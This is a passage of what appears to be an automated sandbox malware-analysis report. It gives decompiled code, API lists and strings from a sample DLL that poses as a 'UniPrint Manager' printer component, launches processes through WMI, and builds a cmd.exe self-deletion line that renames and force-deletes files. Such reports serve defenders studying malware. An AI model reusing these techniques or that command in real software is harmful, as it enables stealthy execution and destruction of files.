                                                                                                                        																}
                                                                                                                        																HeapFree(GetProcessHeap(), 0, _t220);
                                                                                                                        															}
                                                                                                                        														}
                                                                                                                        														__imp__#8( &_v280);
                                                                                                                        														_t137 = _v360;
                                                                                                                        														_v276 = _v352;
                                                                                                                        														_v284 = 9;
                                                                                                                        														_t139 =  *((intOrPtr*)( *((intOrPtr*)( *_t137 + 0x14))))(_t137, L"ProcessStartupInformation", 0,  &_v284, 0);
                                                                                                                        														_v352 = 0;
                                                                                                                        														__imp__#2(L"Create");
                                                                                                                        														_t218 = _t139;
                                                                                                                        														_t140 = _v380;
                                                                                                                        														_t142 =  *((intOrPtr*)( *((intOrPtr*)( *_t140 + 0x60))))(_t140, _v352, _t218, 0, 0, _v384,  &_v356, 0);
                                                                                                                        														_t219 = __imp__#6;
                                                                                                                        														_v376 = _t142;
                                                                                                                        														 *_t219(_t218);
                                                                                                                        														 *_t219(_t157);
                                                                                                                        														if(_t213 != 0) {
                                                                                                                        															 *_t219(_t213);
                                                                                                                        														}
                                                                                                                        														if(_v384 >= 0) {
                                                                                                                        															_t145 = _v396;
                                                                                                                        															 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 8))))(_t145);
                                                                                                                        															_v392 = 1;
                                                                                                                        														}
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												_t124 = _v324;
                                                                                                                        												 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))(_t124);
                                                                                                                        											}
                                                                                                                        											_t121 = _v312;
                                                                                                                        											 *((intOrPtr*)( *((intOrPtr*)( *_t121 + 8))))(_t121);
                                                                                                                        										}
                                                                                                                        										_t116 = _v304;
                                                                                                                        										 *((intOrPtr*)( *((intOrPtr*)( *_t116 + 8))))(_t116);
                                                                                                                        										_t211 = _v284;
                                                                                                                        									}
                                                                                                                        									_t107 = _v252;
                                                                                                                        									 *((intOrPtr*)( *((intOrPtr*)( *_t107 + 8))))(_t107);
                                                                                                                        								}
                                                                                                                        								_t102 = _v236;
                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 8))))(_t102);
                                                                                                                        							}
                                                                                                                        							__imp__#6(_t211);
                                                                                                                        						}
                                                                                                                        						_t92 = _v192;
                                                                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 8))))(_t92);
                                                                                                                        					}
                                                                                                                        					_t88 = _v140;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t88 + 8))))(_t88);
                                                                                                                        					return _v132;
                                                                                                                        				}
                                                                                                                        			}

                                                                                                                        APIs
                                                                                                                        • CoInitializeEx.OLE32(00000000,00000006), ref: 6F3329E0
                                                                                                                        • CoCreateInstance.OLE32(6F33DF9C,00000000,00000001,6F33DECC,?), ref: 6F3329FC
                                                                                                                        • SysAllocString.OLEAUT32(00787680), ref: 6F332A1D
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332A3C
                                                                                                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 6F332A59
                                                                                                                        • SysAllocString.OLEAUT32(Win32_Process), ref: 6F332A70
                                                                                                                        • SysAllocString.OLEAUT32(Win32_ProcessStartup), ref: 6F332A9E
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332ABA
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 6F332AF1
                                                                                                                          • Part of subcall function 6F33A360: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000,?,00000000,00000000,?,6F3375D5,?,00000001,00000000), ref: 6F33A37F
                                                                                                                          • Part of subcall function 6F33A360: GetProcessHeap.KERNEL32(00000008,00000002), ref: 6F33A392
                                                                                                                          • Part of subcall function 6F33A360: HeapAlloc.KERNEL32(00000000), ref: 6F33A399
                                                                                                                          • Part of subcall function 6F33A360: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 6F33A3A9
                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 6F332B79
                                                                                                                        • SysAllocStringLen.OLEAUT32(00000000,-00000002), ref: 6F332B84
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F332B8E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F332B95
                                                                                                                        • PathQuoteSpacesW.SHLWAPI(00000000), ref: 6F332BAA
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 6F332BB5
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 6F332BF9
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F332C2D
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F332C34
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 6F332C3F
                                                                                                                        • SysAllocString.OLEAUT32(Create), ref: 6F332C78
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332CAA
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332CAD
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332CB4
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F332D11
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Free$Alloc$Heap$InitProcessVariant$ByteCharMultiWide$BlanketCreateInitializeInstancePathProxyQuoteSpaceslstrlen
                                                                                                                        • String ID: CommandLine$Create$CurrentDirectory$ProcessStartupInformation$ShowWindow$Win32_Process$Win32_ProcessStartup
                                                                                                                        • API String ID: 2088563290-1030916257
                                                                                                                        • Opcode ID: d6e58e3f9d54f0283946c6fe008999538b595a1c9c38a6ce64008665d2e9a488
                                                                                                                        • Instruction ID: 9e2a923334f07d0e7d1ddaf3872355eef9182f973ed0f6f95c5417562070ed61
                                                                                                                        • Opcode Fuzzy Hash: d6e58e3f9d54f0283946c6fe008999538b595a1c9c38a6ce64008665d2e9a488
                                                                                                                        • Instruction Fuzzy Hash: 83B10572A04359AFC710DFA9C884D6BBBEEFFC9654F10890DF549C7210DA35E9018BA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 71%
                                                                                                                        			E6F3352B0(void* __ebp, intOrPtr _a4) {
                                                                                                                        				char _v256;
                                                                                                                        				char _v264;
                                                                                                                        				long _v268;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				intOrPtr _t7;
                                                                                                                        				void* _t14;
                                                                                                                        				long _t19;
                                                                                                                        				void* _t25;
                                                                                                                        				intOrPtr _t28;
                                                                                                                        				char _t29;
                                                                                                                        				void* _t30;
                                                                                                                        				char _t31;
                                                                                                                        				void* _t33;
                                                                                                                        				intOrPtr _t36;
                                                                                                                        				void* _t37;
                                                                                                                        				void* _t38;
                                                                                                                        				long* _t40;
                                                                                                                        				long* _t41;
                                                                                                                        
                                                                                                                        				_t40 =  &_v268;
                                                                                                                        				_t36 = _a4;
                                                                                                                        				if(M6F34050C != 0 || _t36 != 0) {
                                                                                                                        					E6F334130();
                                                                                                                        				}
                                                                                                                        				_t7 = M6F340544; // 0x1
                                                                                                                        				if(_t7 != 0 && (M6F340540 != 0 || _t36 != 0)) {
                                                                                                                        					_t30 = M6F340534; // 0xa563b0
                                                                                                                        					_push(1);
                                                                                                                        					_push(L"Printer manager");
                                                                                                                        					E6F334C30(_t7, _t30, L"UniPrint Manager");
                                                                                                                        					_t40 =  &(_t40[5]);
                                                                                                                        				}
                                                                                                                        				_push(_t25);
                                                                                                                        				_push(_t33);
                                                                                                                        				_push(0);
                                                                                                                        				_push(0);
                                                                                                                        				E6F3344D0(_t25, _t33);
                                                                                                                        				_t31 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
                                                                                                                        				E6F332DF0(_t31, ".pdll");
                                                                                                                        				_t41 =  &(_t40[4]);
                                                                                                                        				Sleep(0xfa0);
                                                                                                                        				_t37 = HeapAlloc(GetProcessHeap(), 8, 0x400);
                                                                                                                        				if(_t37 != 0) {
                                                                                                                        					_v268 = GetTickCount();
                                                                                                                        					_t19 = RtlRandom( &_v268);
                                                                                                                        					_t29 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
                                                                                                                        					wsprintfA(_t37, "/c ren \"%s*.*\" *.*.%lu.bak & ping 1.1.1.1 -n %u & del /f /q \"%s*.*\"", _t29, _t19, 0xa, _t29);
                                                                                                                        					_push(0);
                                                                                                                        					_push(0);
                                                                                                                        					_push(0);
                                                                                                                        					E6F334230(0, "cmd.exe", _t37);
                                                                                                                        					_t41 =  &(_t41[0xc]);
                                                                                                                        					HeapFree(GetProcessHeap(), 0, _t37);
                                                                                                                        				}
                                                                                                                        				_t28 = M6F34057C; // 0x784250
                                                                                                                        				wsprintfA( &_v264, "%s%s%c", "Global\\", _t28, 0x4b);
                                                                                                                        				_t14 = OpenEventA(2, 0,  &_v256);
                                                                                                                        				_t38 = _t14;
                                                                                                                        				if(_t38 != 0) {
                                                                                                                        					SetEvent(_t38);
                                                                                                                        					return CloseHandle(_t38);
                                                                                                                        				}
                                                                                                                        				return _t14;
                                                                                                                        			}























                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000FA0,?,00000000,?,00000000), ref: 6F335326
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000400,?,00000000,?,00000000), ref: 6F335339
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,?,00000000), ref: 6F33533C
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F33534E
                                                                                                                        • RtlRandom.NTDLL(?), ref: 6F33535D
                                                                                                                        • wsprintfA.USER32 ref: 6F335374
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33538F
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F335392
                                                                                                                        • wsprintfA.USER32 ref: 6F3353B0
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6F3353BE
                                                                                                                        • SetEvent.KERNEL32(00000000), ref: 6F3353CD
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F3353D4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$EventProcesswsprintf$AllocCloseCountFreeHandleOpenRandomSleepTick
                                                                                                                        • String ID: %s%s%c$.pdll$/c ren "%s*.*" *.*.%lu.bak & ping 1.1.1.1 -n %u & del /f /q "%s*.*"$Global\$PBx$Printer manager$UniPrint Manager$cmd.exe
                                                                                                                        • API String ID: 1614445722-4243253615
                                                                                                                        • Opcode ID: d5e8fb1faf36eccd384c6db66b398adbb1a0af4d56a0b0f69633068c7a3e876f
                                                                                                                        • Instruction ID: 3eeff7da2809fba3f8b062ba8bb9e4adb4a81316cc12832d6a9a884bedf6cb9d
                                                                                                                        • Opcode Fuzzy Hash: d5e8fb1faf36eccd384c6db66b398adbb1a0af4d56a0b0f69633068c7a3e876f
                                                                                                                        • Instruction Fuzzy Hash: 64315BB3E00BA57BE620E764DC09F5B376DEB46B20F000108F910AB2C0DBB5F4248BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 92%
                                                                                                                        			E6F331100(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                        				short _v512;
                                                                                                                        				short _v520;
                                                                                                                        				short _v1036;
                                                                                                                        				short _v1040;
                                                                                                                        				short _v1044;
                                                                                                                        				short _v1048;
                                                                                                                        				short _v1052;
                                                                                                                        				intOrPtr _t24;
                                                                                                                        				WCHAR* _t39;
                                                                                                                        				void* _t41;
                                                                                                                        				intOrPtr _t65;
                                                                                                                        				void* _t67;
                                                                                                                        				void* _t73;
                                                                                                                        				void* _t75;
                                                                                                                        				long* _t77;
                                                                                                                        
                                                                                                                        				_t24 = _a4;
                                                                                                                        				 *_t77 = 0;
                                                                                                                        				if(_t24 != 2) {
                                                                                                                        					if(_t24 != 3) {
                                                                                                                        						goto L16;
                                                                                                                        					} else {
                                                                                                                        						CloseHandle( *(_a8 + 0x14));
                                                                                                                        						return 1;
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					_t71 = _a8;
                                                                                                                        					_v1052 =  *(_a8 + 0x10);
                                                                                                                        					_t75 = E6F33A360( *((intOrPtr*)( *(_a8 + 0x10) + 4)), 0, 0);
                                                                                                                        					_t77 =  &(_t77[3]);
                                                                                                                        					if(_t75 != 0) {
                                                                                                                        						_t73 = E6F33A360( *((intOrPtr*)(_t71 + 4)), ( *(_t71 + 0x1c) & 0x0000ffff) >> 0x00000007 & 0x00000001, 0);
                                                                                                                        						_t77 =  &(_t77[3]);
                                                                                                                        						if(_t73 != 0) {
                                                                                                                        							wsprintfW( &_v1048, L"\\\\.\\%s%s", _t75, _t73);
                                                                                                                        							_t77 =  &(_t77[4]);
                                                                                                                        							PathRemoveFileSpecW( &_v1040);
                                                                                                                        							PathAddBackslashW( &_v1040);
                                                                                                                        							_t39 =  &_v1040;
                                                                                                                        							__imp__SHCreateDirectoryExW(0, _t39, 0, _t67);
                                                                                                                        							if(_t39 == 0 || _t39 == 0x50 || _t39 == 0xb7) {
                                                                                                                        								wsprintfW( &_v1052, L"\\\\.\\%s%s", _t75, _t73);
                                                                                                                        								_t77 =  &(_t77[4]);
                                                                                                                        								_t41 = CreateFileW( &_v1044, 0xc0000000, 0, 0, 4, 0x80, 0);
                                                                                                                        								if(_t41 != 0xffffffff) {
                                                                                                                        									L11:
                                                                                                                        									_v1052 = _t41;
                                                                                                                        								} else {
                                                                                                                        									if( *_v1048 != 0 && GetFileAttributesW( &_v1044) != 0xffffffff) {
                                                                                                                        										_t65 =  *0x6f340270; // 0x0
                                                                                                                        										wsprintfW( &_v520, L"%s%c%lu%s",  &_v1044, 0x2e, _t65, L".bak");
                                                                                                                        										_t77 =  &(_t77[6]);
                                                                                                                        										if(MoveFileExW( &_v1036,  &_v512, 0) != 0) {
                                                                                                                        											_t41 = CreateFileW( &_v1036, 0xc0000000, 0, 0, 4, 0x80, 0);
                                                                                                                        											if(_t41 != 0xffffffff) {
                                                                                                                        												goto L11;
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t73);
                                                                                                                        						}
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t75);
                                                                                                                        					}
                                                                                                                        					L16:
                                                                                                                        					return  *_t77;
                                                                                                                        				}
                                                                                                                        			}



















                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F3312A8
                                                                                                                          • Part of subcall function 6F33A360: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000,?,00000000,00000000,?,6F3375D5,?,00000001,00000000), ref: 6F33A37F
                                                                                                                          • Part of subcall function 6F33A360: GetProcessHeap.KERNEL32(00000008,00000002), ref: 6F33A392
                                                                                                                          • Part of subcall function 6F33A360: HeapAlloc.KERNEL32(00000000), ref: 6F33A399
                                                                                                                          • Part of subcall function 6F33A360: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 6F33A3A9
                                                                                                                        • wsprintfW.USER32 ref: 6F33117D
                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?), ref: 6F331187
                                                                                                                        • PathAddBackslashW.SHLWAPI(?), ref: 6F331192
                                                                                                                        • SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 6F3311A1
                                                                                                                        • wsprintfW.USER32 ref: 6F3311C8
                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 6F3311EA
                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 6F3311FF
                                                                                                                        • wsprintfW.USER32 ref: 6F33122A
                                                                                                                        • MoveFileExW.KERNEL32(?,?,00000000), ref: 6F33123E
                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 6F33125F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33126E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F331275
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33127F
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F331286
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$File$CreateProcesswsprintf$ByteCharFreeMultiPathWide$AllocAttributesBackslashCloseDirectoryHandleMoveRemoveSpec
                                                                                                                        • String ID: %s%c%lu%s$.bak$\\.\%s%s
                                                                                                                        • API String ID: 452034401-1383541090
                                                                                                                        • Opcode ID: fbf9a73df4146104490c5fb3008d180738c3dc9c40fd67268f668b5c1f820ce7
                                                                                                                        • Instruction ID: 63b981e06f3eb6282e5fb6294b6f91e10a03dd73e991e1b444485a580a32a779
                                                                                                                        • Opcode Fuzzy Hash: fbf9a73df4146104490c5fb3008d180738c3dc9c40fd67268f668b5c1f820ce7
                                                                                                                        • Instruction Fuzzy Hash: 2541C273A04394ABD720EBA0CC85FAB77ACEB48B20F004A0CF655D61C0D7B5E414C7A6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004C8512
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 004C855A
                                                                                                                        • GetLastError.KERNEL32 ref: 004C858A
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 004C87D5
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004C87FC
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004C88C4
                                                                                                                        • GetLastError.KERNEL32 ref: 004C88E0
                                                                                                                          • Part of subcall function 004A2E7D: __EH_prolog3.LIBCMT ref: 004A2E84
                                                                                                                          • Part of subcall function 0040E968: __EH_prolog3.LIBCMT ref: 0040E96F
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004C8989
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004C8A26
                                                                                                                        Strings
                                                                                                                        • process_tools.SetTokenPrivilege: OpenThreadToken for privilege , xrefs: 004C8684, 004C8835
                                                                                                                        • ' not found, xrefs: 004C88F9
                                                                                                                        • process_tools.SetTokenPrivilege: LookupPrivilegeValue for privilege , xrefs: 004C8A5B
                                                                                                                        • failed with error , xrefs: 004C865C, 004C8813, 004C8A39
                                                                                                                        • process_tools.SetTokenPrivilege: Privilege ', xrefs: 004C891E
                                                                                                                        • with error , xrefs: 004C89A0
                                                                                                                        • . Using process token., xrefs: 004C8634
                                                                                                                        • process_tools.SetTokenPrivilege: AdjustTokenPrivileges failed for privilege , xrefs: 004C89C2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$H_prolog3$Current$CloseCriticalDeleteHandleProcessSectionThread
                                                                                                                        • String ID: failed with error $ with error $' not found$. Using process token.$process_tools.SetTokenPrivilege: AdjustTokenPrivileges failed for privilege $process_tools.SetTokenPrivilege: LookupPrivilegeValue for privilege $process_tools.SetTokenPrivilege: OpenThreadToken for privilege $process_tools.SetTokenPrivilege: Privilege '
                                                                                                                        • API String ID: 507264954-360949472
                                                                                                                        • Opcode ID: 17df40961581c14ec2d7c137070c1c69f547131effea247b9bd0673728ffc2f7
                                                                                                                        • Instruction ID: 3dbb8db9447217885d83a8932ecef01bed5cd9d2b57d8fc73de6323039766bf2
                                                                                                                        • Opcode Fuzzy Hash: 17df40961581c14ec2d7c137070c1c69f547131effea247b9bd0673728ffc2f7
                                                                                                                        • Instruction Fuzzy Hash: 7A029E7180418CEAEB15EBA4CD95FED7B78AF25308F04819EF44627192EB785F08DB25
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CountTick$_strncmp$H_prolog3Sleep_memset_strlenioctlsocketselect
                                                                                                                        • String ID: $
                                                                                                                        • API String ID: 1920849741-1846248685
                                                                                                                        • Opcode ID: 1a92c313e3ae084b3ff540cd8bc379729239567c1cbd4a5dc6fa70e25aa1ce18
                                                                                                                        • Instruction ID: 907f7e7657ea471fb6a7299b6a9d2a4386095d1e68258f24096403a28a1d6dfd
                                                                                                                        • Opcode Fuzzy Hash: 1a92c313e3ae084b3ff540cd8bc379729239567c1cbd4a5dc6fa70e25aa1ce18
                                                                                                                        • Instruction Fuzzy Hash: 467192B090020AAFDF10EF64CC85DFE7F70FF04355B10452AE9199B2A1D7789A55CB5A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 97%
                                                                                                                        			E6F333930(void* __ebx, void* _a4) {
                                                                                                                        				long _v4;
                                                                                                                        				long _v8;
                                                                                                                        				CHAR* _t22;
                                                                                                                        				long _t26;
                                                                                                                        				int _t33;
                                                                                                                        				void* _t34;
                                                                                                                        				void* _t47;
                                                                                                                        				signed int _t53;
                                                                                                                        				void* _t54;
                                                                                                                        				WCHAR* _t56;
                                                                                                                        				long* _t59;
                                                                                                                        
                                                                                                                        				if(_a4 == 0) {
                                                                                                                        					L19:
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        				_t56 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
                                                                                                                        				if(_t56 == 0) {
                                                                                                                        					L18:
                                                                                                                        					HeapFree(GetProcessHeap(), 0, _a4);
                                                                                                                        					goto L19;
                                                                                                                        				}
                                                                                                                        				_v4 = 0;
                                                                                                                        				_t22 = GetCommandLineA();
                                                                                                                        				_v8 = 0;
                                                                                                                        				_t47 = E6F33A3D0(_t22,  &_v8);
                                                                                                                        				_t59 =  &(( &_v8)[2]);
                                                                                                                        				if(_t47 == 0) {
                                                                                                                        					L17:
                                                                                                                        					HeapFree(GetProcessHeap(), 0, _t56);
                                                                                                                        					goto L18;
                                                                                                                        				}
                                                                                                                        				_t26 = _v8;
                                                                                                                        				if(_t26 <= 1) {
                                                                                                                        					L15:
                                                                                                                        					LocalFree(_t47);
                                                                                                                        					if(_v4 != 0) {
                                                                                                                        						_push( *_a4);
                                                                                                                        						E6F333610(_t56);
                                                                                                                        					}
                                                                                                                        					goto L17;
                                                                                                                        				} else {
                                                                                                                        					_t53 = 1;
                                                                                                                        					do {
                                                                                                                        						if(_t53 >= _t26 - 1) {
                                                                                                                        							goto L8;
                                                                                                                        						}
                                                                                                                        						if(lstrcmpiA( *(_t47 + _t53 * 4), "-svcr") == 0) {
                                                                                                                        							_t54 = E6F33A360( *((intOrPtr*)(_t47 + 4 + _t53 * 4)), 0, 0);
                                                                                                                        							_t59 =  &(_t59[3]);
                                                                                                                        							if(_t54 != 0) {
                                                                                                                        								_v4 = 1;
                                                                                                                        								_t33 = PathIsRelativeW(_t54);
                                                                                                                        								_t34 = M6F340520; // 0xa4df18
                                                                                                                        								if(_t33 == 0) {
                                                                                                                        									_t34 = 0x6f33d664;
                                                                                                                        								}
                                                                                                                        								wsprintfW(_t56, L"\"%s%s\"", _t34, _t54);
                                                                                                                        								_t59 =  &(_t59[4]);
                                                                                                                        								HeapFree(GetProcessHeap(), 0, _t54);
                                                                                                                        							}
                                                                                                                        							L14:
                                                                                                                        							goto L15;
                                                                                                                        						}
                                                                                                                        						_t26 = _v8;
                                                                                                                        						L8:
                                                                                                                        						_t53 = _t53 + 1;
                                                                                                                        					} while (_t53 < _t26);
                                                                                                                        					goto L14;
                                                                                                                        				}
                                                                                                                        			}















                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 6F33394D
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F333950
                                                                                                                        • GetCommandLineA.KERNEL32 ref: 6F333969
                                                                                                                          • Part of subcall function 6F33A3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6F33A3DB
                                                                                                                          • Part of subcall function 6F33A3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6F33A3F4
                                                                                                                        • lstrcmpiA.KERNEL32(?,-svcr), ref: 6F3339B8
                                                                                                                        • PathIsRelativeW.SHLWAPI ref: 6F3339E9
                                                                                                                        • wsprintfW.USER32 ref: 6F333A05
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 6F333A11
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 6F333A18
                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 6F333A20
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F333A46
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F333A49
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F333A57
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F333A5A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
